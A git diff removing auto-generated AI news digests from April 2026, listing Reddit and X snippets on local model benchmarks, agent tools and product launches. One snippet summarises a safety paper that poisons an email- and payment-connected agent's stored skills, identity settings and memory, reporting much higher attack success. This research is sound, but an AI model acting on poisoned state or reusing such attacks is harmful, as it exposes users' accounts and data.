pressure, drivers, and backend issues, we traced it to th - ---- - -## [llama.cpp - llama-bench: add `-fitc` and `-fitt` to arguments](https://reddit.com/r/LocalLLaMA/comments/1se8ezw/llamacpp_llamabench_add_fitc_and_fitt_to_arguments/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: product_launch - -> Was expecting this for sometime. This is available [b8679](https://github.com/ggml-org/llama.cpp/releases/tag/b8679) onwards. - ---- - -## [I benchmarked 37 LLMs on MacBook Air M5 32GB — full results + open-source tool to benchmark your own Mac](https://reddit.com/r/LocalLLaMA/comments/1se81a5/i_benchmarked_37_llms_on_macbook_air_m5_32gb_full/) -*Reddit r/LocalLLaMA* | 06/04/2026 | Score: 1.00 -Tags: open_source - -> So I got curious about how fast different models actually run on my M5 Air (32GB, 10 CPU/10 GPU). Instead of just testing one or two, I went through 37 models across 10 different families and recorded everything using llama-bench with Q4\_K\_M quantization. The goal: build a **community benchmark database** covering every Apple Silicon chip (M1 through M5, base/Pro/Max/Ultra) so anyone can look up performance for their exact hardware. # The Results (M5 32GB, Q4_K_M, llama-bench) # Top 15 by G - ---- - diff --git a/data/digest-2026-04-07.md b/data/digest-2026-04-07.md deleted file mode 100644 index 26d7e73..0000000 --- a/data/digest-2026-04-07.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-07** | 15 stories | Auto-generated from 570 archived stories - ---- - -## [I wanted Claude Max but I'm a broke CS student. So I built an open-source TUI orchestrator that forces free/local models to act as a swarm using AST-Hypergraphs and Git worktrees. I would appreciate suggestions, advice, and feedback that can help me improve the tool before I release it!](https://reddit.com/r/ClaudeAI/comments/1seg9i0/i_wanted_claude_max_but_im_a_broke_cs_student_so/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 1.00 -Tags: api_update, open_source, cli_tool - -> Hey everyone, I'm a Computer Science undergrad, and lately, I've been obsessed with the idea of autonomous coding agents. The problem? I simply cannot afford the costs of running massive context windows for multi-step reasoning. I wanted to build a CLI tool that could utilize local models, API endpoints or/and the coolest part, it can utilize tools like **Codex**, **Antigravity**, **Cursor**, VS Code's **Copilot** (All of these tools have free tiers and student plans), and **Claude Code** to - ---- - -## [[D] MemPalace claims 100% on LoCoMo and a "perfect score on LongMemEval." Its own BENCHMARKS.md documents why neither is meaningful.](https://reddit.com/r/MachineLearning/comments/1seunbr/d_mempalace_claims_100_on_locomo_and_a_perfect/) -*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 -Tags: open_source, tool_update - -> A new open-source memory project called MemPalace launched yesterday claiming "100% on LoCoMo" and "the first perfect score ever recorded on LongMemEval. 500/500 questions, every category at 100%." The launch tweet went viral reaching over 1.5 million views while the repository picked up over 7,000 GitHub stars in less than 24 hours. The interesting thing is not that the headline numbers are inflated. The interesting thing is that the project's own BENCHMARKS.md file documents this in detail, w - ---- - -## [Built an open source memory layer for local AI agents, runs fully offline, no cloud needed](https://reddit.com/r/LocalLLaMA/comments/1serbdw/built_an_open_source_memory_layer_for_local_ai/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I built an open source memory layer for AI agents called Octopoda. Runs entirely locally, no cloud, no API keys, no external services. Everything stays on your machine. The problem is pretty simple. Agents forget everything between sessions. Every time you restart your agent it starts from scratch like you never talked to it. I kept building hacky workarounds for this so eventually I just built a proper solution. It gives your agents persistent memory that survives restarts and crashes, semant - ---- - -## [Mistral Introduces "Voxtral TTS": An Open-Weight Text-to-Voice Model Capable Of Cloning Any Voice From 3 Seconds Of Audio, Runs In 9 Languages, & Beats Elevenlabs Flash V2.5 With A 68.4% Human Preference Win Rate.](https://reddit.com/r/LocalLLaMA/comments/1selwtz/mistral_introduces_voxtral_tts_an_openweight/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> ElevenLabs built a moat on proprietary weights and API lock-in. Mistral just put the weights on Hugging Face. The model captures not just the voice but the person. Accents, inflections, intonations, vocal fillers the "ums" and "ahs" that make a voice sound human instead of synthetic. From 3 seconds of reference audio. Zero fine-tuning. Zero shot. --- ####Key Highlights: - → 68.4% win rate against ElevenLabs Flash v2.5 in zero-shot multilingual voice cloning - → Beats ElevenLabs Flash v2.5 - ---- - -## [OpenCode Is Working Towards Version 2.0 — 46 Likes for the Developer Update](https://x.com/thdxr/status/2041330695822279077) -*Aligned News (Scoble)* | 07/04/2026 | Score: 1.00 -Tags: cli_tool, tool_update - -> Braygent's take on OpenCode working towards 2.0 with Node.js support and updated APIs (46 likes), noting that while Claude Code loses builders, OpenCode keeps shipping improvements. - ---- - -## [Pro Subscription Usage](https://reddit.com/r/ClaudeAI/comments/1sf7fi9/pro_subscription_usage/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.94 -Tags: mcp, open_source - -> Hi there. I've been on the Max 20x plan for many months now - I'd hit the hourly cap sometimes and the weekly cap rarely, each week. I build and host open source "public service" MCP servers with my sub. I haven't been doing well health wise and haven't been able to work - I spent $20 of my last $100 buying a Pro sub because my Max sub ended today and I use Claude to assist me with nearly everything at this point. Before even entering my first prompt, it showed I had already used 11% of - ---- - -## [Second Brain and Haah: human-agent-agent-human network with Claude](https://reddit.com/r/ClaudeAI/comments/1setpma/second_brain_and_haah_humanagentagenthuman/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.78 -Tags: open_source, tool_update - -> I built something I genuinely enjoy with Claude. I was working on an app for a year and over last three weeks I completely replaced it with skills for Claude Code. Built frontend, backend, and matching mechanism with Claude. Disrupted myself. Launched six open source skills including Haah: human-agent-agent-human to network for your second brain. The idea is to build up a few domains: People, Places, Books, Music, and link them together in a meaningful way. But then would not be cool that if I - ---- - -## [stop buying courses to learn new tools. a $20 claude sub and one prompt is all you need.](https://reddit.com/r/ClaudeAI/comments/1setmup/stop_buying_courses_to_learn_new_tools_a_20/) -*Reddit r/ClaudeAI* | 07/04/2026 | Score: 0.70 -Tags: developer_tool, tool_update - -> **tl;dr** — feed a tool's docs into claude's context and use one prompt to turn it into a mentor that teaches by giving you tasks. not by lecturing. i've been doing this since claude launched Projects in mid-2024. haven't bought a tech course since. whenever i need to pick up a new tool or framework, i skip the 3-hour youtube tutorials. instead, i grab the official docs (markdown from github), dump them into a claude chat, and send this: `You are my senior mentor. I have provided documentation - ---- - -## [[D] Your Agent, Their Asset: Real-world safety evaluation of OpenClaw agents (CIK poisoning raises attack success to ~64–74%)](https://reddit.com/r/MachineLearning/comments/1sfbo0n/d_your_agent_their_asset_realworld_safety/) -*Reddit r/MachineLearning* | 08/04/2026 | Score: 1.00 -Tags: agent_tool - -> Paper: https://arxiv.org/abs/2604.04759 This paper presents a real-world safety evaluation of OpenClaw, a personal AI agent with access to Gmail, Stripe, and the local filesystem. The authors introduce a taxonomy of persistent agent state: \- Capability (skills / executable code) \- Identity (persona, trust configuration) \- Knowledge (memory) They evaluate 12 attack scenarios on a live system across multiple models. Key results: \- baseline attack success rate: \~10–36.7% \- after pois - ---- - -## [Strix Halo + eGPU RTX 5070 Ti via OCuLink in llama.cpp: Benchmarks and Conclusions](https://reddit.com/r/LocalLLaMA/comments/1sf9i82/strix_halo_egpu_rtx_5070_ti_via_oculink_in/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update - -> https://preview.redd.it/nqok3dch7utg1.jpg?width=4096&format=pjpg&auto=webp&s=d5c1d3f5e5c1d8c0ba986726d2bda08212175fec Hey everyone. I have a Strix Halo miniPC (Minisforum MS-S1 Max). I added an RTX 5070 Ti eGPU to it via OCuLink, ran some tests on how they work together in llama.cpp, and wanted to share some of my findings. **TL;DR of my findings:** 1. **Vulkan's versatility:** It's a highly efficient API that lets you stably combine chips from different vendors (like an AMD APU + - ---- - -## [Found this cool new harness, gonna give it a spin with the new GLM 5.1. I’ll report back later.](https://reddit.com/r/LocalLLaMA/comments/1sf6cds/found_this_cool_new_harness_gonna_give_it_a_spin/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: developer_tool - -> Found it on a USB drive in the parking lot. Should be interesting. Seriously tho, props to this guy and his cool Hermes Agent skins library here: https://github.com/joeynyc/hermes-skins - ---- - -## [Gemma 4 - split mode Graph (Tensor Parallelism) in ik_llama incommming](https://reddit.com/r/LocalLLaMA/comments/1sf66a3/gemma_4_split_mode_graph_tensor_parallelism_in_ik/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: tool_update - -> [https://github.com/ikawrakow/ik\_llama.cpp/pull/1596](https://github.com/ikawrakow/ik_llama.cpp/pull/1596) This should bring the 31b dense model in a usable speed range for many with dual/multi GPUs. Also today I did quite some PPL Tests today with mainline llama.cpp and ik\_llama.cpp unsloth variants (updated from yesterday) have like INSANE high PPL - without even trying KV Cache quants - on both. Bartowski quants and the ggml-org ones are WAY lower on both, especially lower on ik\_lla - ---- - -## [Cloud AI subscriptions are getting desperate with retention. honestly makes me want to go more local](https://reddit.com/r/LocalLLaMA/comments/1sf305a/cloud_ai_subscriptions_are_getting_desperate_with/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: api_update - -> Ok so two things happened this week that made me appreciate my local setup way more tried to cancel cursor ($200/mo ultra plan) and they instantly threw 50% off at me before I could even confirm. no survey, no exit flow, just straight to "please stay." thats not confidence lol then claude (im on the $100/mo pro plan) started giving me free API calls. 100 one day, 100 the next day. no email about it, no announcement, just free compute showing up. very "please dont leave" energy their core cust - ---- - -## [[P] A control plane for post-training workflows](https://reddit.com/r/MachineLearning/comments/1sf1hdt/p_a_control_plane_for_posttraining_workflows/) -*Reddit r/MachineLearning* | 07/04/2026 | Score: 1.00 -Tags: cli_tool - -> We have been exploring a project around post-training infrastructure, a minimalist tool that does one thing really well: Make post-training a little less painful by equipping Researchers, AI/ML engineers & Tinkerers with a gentle control plane. Post-training models tends to introduce a new axis of complexity - the orchestration and compute ressource management - alongside defining your own training loop, your rewards & rubrics, managing the parallel training. Tahuna is CLI-first, it s - ---- - -## [Auto-creation of agent SKILLs from observing your screen via Gemma 4 for any agent to execute and self-improve](https://reddit.com/r/LocalLLaMA/comments/1sey6vv/autocreation_of_agent_skills_from_observing_your/) -*Reddit r/LocalLLaMA* | 07/04/2026 | Score: 1.00 -Tags: open_source - -> AgentHandover is an open-source Mac menu bar app that watches your screen through Gemma 4 (running locally via Ollama) and turns your repeated workflows into structured Skill files that any agent can follow. I built it because every time I wanted an agent to handle something for me I had to explain the whole process from scratch, even for stuff I do daily. So AgentHandover just watches instead. You can either hit record for a specific task (Focus Record) or let it run in the background where it - ---- - diff --git a/data/digest-2026-04-08.md b/data/digest-2026-04-08.md deleted file mode 100644 index fe89e0a..0000000 --- a/data/digest-2026-04-08.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-08** | 15 stories | Auto-generated from 652 archived stories - ---- - -## [@Vugola — Vugola Launches API — World's First Agentic Clipping Tool for Creators](https://x.com/VadimStrizheus/status/2041498727131517193) -*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 -Tags: api_update, product_launch, tool_update - -> Vugola has launched an API for the world's first agentic clipping tool. Send a YouTube link, your agent asks for ratio and caption styles, and delivers clips via Telegram, Discord, or WhatsApp. - ---- - -## [Scoble RT: Zapier Opens SDK to Everyone — 9,000+ App Integrations for AI Agent Builders](https://x.com/wadefoster/status/2041721371357851859) -*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 -Tags: api_update, developer_tool, agent_tool - -> Robert Scoble retweeted Zapier CEO Wade Foster's announcement that the Zapier SDK is now open to everyone building with AI agents. - ---- - -## [How I cut Claude Code usage in half (open source)](https://reddit.com/r/ClaudeAI/comments/1sfgnzd/how_i_cut_claude_code_usage_in_half_open_source/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 -Tags: api_update, mcp, open_source - -> Every time I start a Claude Code session on a real codebase, it burns through tokens just trying to understand the repo. Read the file tree, open 20 files, trace the imports, figure out how auth connects to the API layer. On a 50k+ LOC project that exploration phase eats your context window before any real work starts. I built Repowise to fix this. It's a codebase intelligence layer that pre-computes the structural knowledge Claude Code needs and exposes it through MCP tools. Dependency graphs - ---- - -## [I used Claude to build a full networking protocol for AI agents. It’s now at 12K+ nodes across 19 countries.](https://reddit.com/r/ClaudeAI/comments/1sg6gfe/i_used_claude_to_build_a_full_networking_protocol/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 -Tags: mcp, developer_tool - -> I’ve been working on a core infrastructure problem for multi-agent systems and wanted to share an update since the last post here got some good discussion. The problem: every agent framework assumes agents can already reach each other. MCP gives agents tools, A2A gives agents a way to talk, but both run on HTTP which means someone has to set up public endpoints, open ports, configure DNS, provision certs. The agent can’t do any of that itself. I used Claude Code to build the solution because th - ---- - -## [Anthropic launched Claude Managed Agents — cloud-hosted autonomous AI agents](https://reddit.com/r/ClaudeAI/comments/1sfzigj/anthropic_launched_claude_managed_agents/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 1.00 -Tags: api_update, tool_update - -> Anthropic released a new API suite for deploying long-running autonomous agents with built-in sandboxing, credential management, and multi-agent coordination. Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. [https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) - ---- - -## [Meta Releases Muse Spark - A Natively Multimodal Reasoning model](https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration. Blog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/) - ---- - -## [Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms](https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. It builds on LFM2-VL-450M with three new capabilities: * bounding box prediction (81.28 on RefCOCO-M) * multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and * function calling support. Most production vision systems are still multi-stage: a detector, a classifier, - ---- - -## [Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.](https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/) -*Reddit r/StableDiffusion* | 08/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> It's pretty neat, used \~12.5gb out of the box. Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model. And, weights are permissively licensed (MIT) which might encourage more people to hack on it. Also worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i - ---- - -## [M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king](https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: product_launch, open_source - -> The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc.. Gemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i - ---- - -## [Last Week in Multimodal AI - Local Edition](https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/) -*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week: * **Google Gemma 4** \- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine. [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4) * **TII Falcon Perception** \- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. Punches way above its wei - ---- - -## [@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech](https://x.com/omma_ai/status/2041622310503997632) -*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 -Tags: product_launch, tool_update - -> Omma has launched audio generation including music and songs, sound effects, and text to speech. Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds. - ---- - -## [Review This Prompt And Feedback it.](https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/) -*Reddit r/ChatGPT* | 08/04/2026 | Score: 0.86 -Tags: api_update, cli_tool - -> ROLE You are an expert \[e.g. full-stack developer / product designer / ML engineer\] with deep experience in \[tech stack / domain\]. Your job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed. PROJECT Name: \[Project name\] Type: \[Web app / CLI tool / API / Dashboard / Bot / etc.\] One-liner: \[What it does in one sentence\] Target user: \[Who will use this\] GOAL Build a complete, working, production-ready \[project type\] that - ---- - -## [Reddit is broken! I proved it with Claude](https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.78 -Tags: api_update, developer_tool - -> Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma. **How I built it with Claude:** I used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. Claude also helped me wr - ---- - -## [I built an MCP that gives Claude Code its own servers to fix bugs in parallel](https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/) -*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.70 -Tags: mcp, cli_tool - -> I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS "force quit" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other. So I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \~$0.03 - ---- - -## [Turbo-OCR for high-volume image and PDF processing](https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: open_source - -> I recently had to process \~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed. The Problem: * PaddleOCR (the most popular open source OCR): Maxed out at \~15 img/s. GPU utilization hovered around 15%. Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either. * VLM OCR (via vLLM): Great accuracy, but crawled at 2 im - ---- - diff --git a/data/digest-2026-04-09.md b/data/digest-2026-04-09.md deleted file mode 100644 index c503e0c..0000000 --- a/data/digest-2026-04-09.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-09** | 15 stories | Auto-generated from 616 archived stories - ---- - -## [Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It](https://x.com/ghumare64/status/2042234817358462986) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: open_source, developer_tool, agent_tool - -> Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. The architectural difference is fundamental. - ---- - -## [OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mys - ---- - -## [OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> OpenWork is locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mysel - ---- - -## [I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.](https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.86 -Tags: developer_tool, tool_update - -> So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town. Then I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two. Three pieces of perfect - ---- - -## [Managed Agents launched today. I built a Slack relay, tested it end-to-end. Here's what I found.](https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 -Tags: api_update, tool_update - -> Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. The prompt caching is genuinely impressive. My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle - ---- - -## [I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects](https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 -Tags: api_update, mcp - -> I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files. While building it, I started scanning my own projects with it. What I found was uncomfortable. In one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database. Across my last 5 projects, th - ---- - -## [your claude doesn't need a better memory, it needs a self-evolving knowledge base](https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> https://i.redd.it/57wdspbqc6ug1.gif Andrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers. I've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes. The idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episod - ---- - -## [Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?](https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/) -*Reddit r/ChatGPT* | 09/04/2026 | Score: 0.62 -Tags: api_update, open_source - -> Honest question for people who actually use these models: The main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns. Now that they're closing up, the calculus changes: \- No local deployment \- API calls go to servers in China \- No way to verify what the model is actually doing Is this a dealbrea - ---- - -## [Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands](https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: cli_tool - -> I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \~10 approaches) https://i.redd.it/ferxmyorh7ug1.gif Bare model: \~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. All within noise of baseline, and self-critique was actively wors - ---- - -## [OpenAI pauses UK data centre deal over energy costs and regulationThe project was part of a package of tech investment promising the UK could become an AI superpower.See more](https://www.bbc.com/news/articles/clyd032ej70o) -*BBC AI* | Score: 1.00 -Tags: developer_tool - ---- - -## [I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled](https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: tool_update - -> **TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**. Standard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**. So for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a - ---- - -## [LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence](https://x.com/LG_AI_Research) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: tool_update - -> LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. LG's hardware and manufacturing expertise gives them unique insight into what robots need. - ---- - -## [Open-Source Models Can Do Everything Claude Mythos Can Do](https://x.com/stanislavfort) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: open_source - -> Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy. - ---- - -## [NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation](https://x.com/MattNiessner/status/2036019740930408905) -*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 -Tags: tool_update - -> NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. The integration highlights NanoBanana's versatility. - ---- - -## [Unused phone as AI server](https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/) -*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 -Tags: api_update - -> If you have an unused phone lying around, you might be sitting on a tiny AI server I’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: \[Gallery as Server\](https://github.com/xiaoyao9184/gallery) Your phone can run local AI inference You can call it just like an OpenAI API (chat/completions, etc.) Instead of letting that hardware collect dust, you can turn it into a lightweight inference node. So yeah—if you have more t - ---- - diff --git a/data/digest-2026-04-10.md b/data/digest-2026-04-10.md deleted file mode 100644 index 5985cad..0000000 --- a/data/digest-2026-04-10.md +++ /dev/null @@ -1,123 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-10** | 15 stories | Auto-generated from 178 archived stories - ---- - -## [Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore](https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/) -*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 -Tags: product_launch, developer_tool, tool_update, agent_tool - -> Anthropic just made Claude Cowork generally available on all paid plans, added enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale. in the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev - ---- - -## [@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30](https://x.com/ArtificialAnlys/status/2042457674441482736) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: api_update, product_launch - -> HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance. - ---- - -## [Combined Karpathy's LLM Wiki with Milla Jovovich`s MemPalace MCP. Claude Code now remembers everything across sessions](https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/) -*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 -Tags: mcp, open_source - -> If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone. I built a system that fixes this. It's called Memoriki - a template that combines two open source projects: **Layer 1: LLM Wiki (Karpathy's pattern)** You drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w - ---- - -## [I no longer need a cloud LLM to do quick web research](https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 